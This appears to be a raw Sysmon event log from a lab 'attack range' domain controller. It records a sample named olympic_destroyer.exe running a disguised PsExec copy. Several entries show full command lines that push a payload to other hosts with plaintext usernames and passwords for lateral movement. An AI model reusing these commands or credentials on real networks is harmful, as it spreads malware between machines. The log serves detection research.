10:57:03.983{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-12FF-6216-E905-000000003802}6720C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.984{C8EA50B7-12FF-6216-E905-000000003802}6720C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.983{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FF-6216-E905-000000003802}6720C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.968{C8EA50B7-12FF-6216-E705-000000003802}5192C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.783{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-0006-000000003802}6596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.783{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-FF05-000000003802}4252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.783{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-FB05-000000003802}596C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:05.041{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=503B8E135C16962509782092C6C5E88E,SHA256=F18B9AC6BC7CFFA9F5860D41478FD5BC9754A232EE63286C62B4632C421D1F78,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.783{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-FB05-000000003802}596C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.783{C8EA50B7-1301-6216-FA05-000000003802}5804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000292308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:05.783{C8EA50B7-1301-6216-FB05-000000003802}596C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.767{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-FA05-000000003802}5804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.767{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-FA05-000000003802}5804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:05.767{C8EA50B7-1301-6216-FA05-000000003802}5804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.736{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-FE05-000000003802}6536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.736{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-FE05-000000003802}6536C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.736{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-FD05-000000003802}6212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.736{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-FD05-000000003802}6212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.720{C8EA50B7-1301-6216-FE05-000000003802}65366280C:\Windows\system32\conhost.exe{C8EA50B7-1301-6216-FB05-000000003802}596C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.720{C8EA50B7-1301-6216-FD05-000000003802}62126424C:\Windows\system32\conhost.exe{C8EA50B7-1301-6216-FA05-000000003802}5804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.699{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-FE05-000000003802}6536C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.683{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-FE05-000000003802}6536C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.683{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-FD05-000000003802}6212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.667{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-FD05-000000003802}6212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.667{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.667{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.667{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.667{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.667{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-FC05-000000003802}5112C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.667{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1301-6216-FC05-000000003802}5112C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.669{C8EA50B7-1301-6216-FC05-000000003802}5112C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.667{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-FC05-000000003802}5112C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 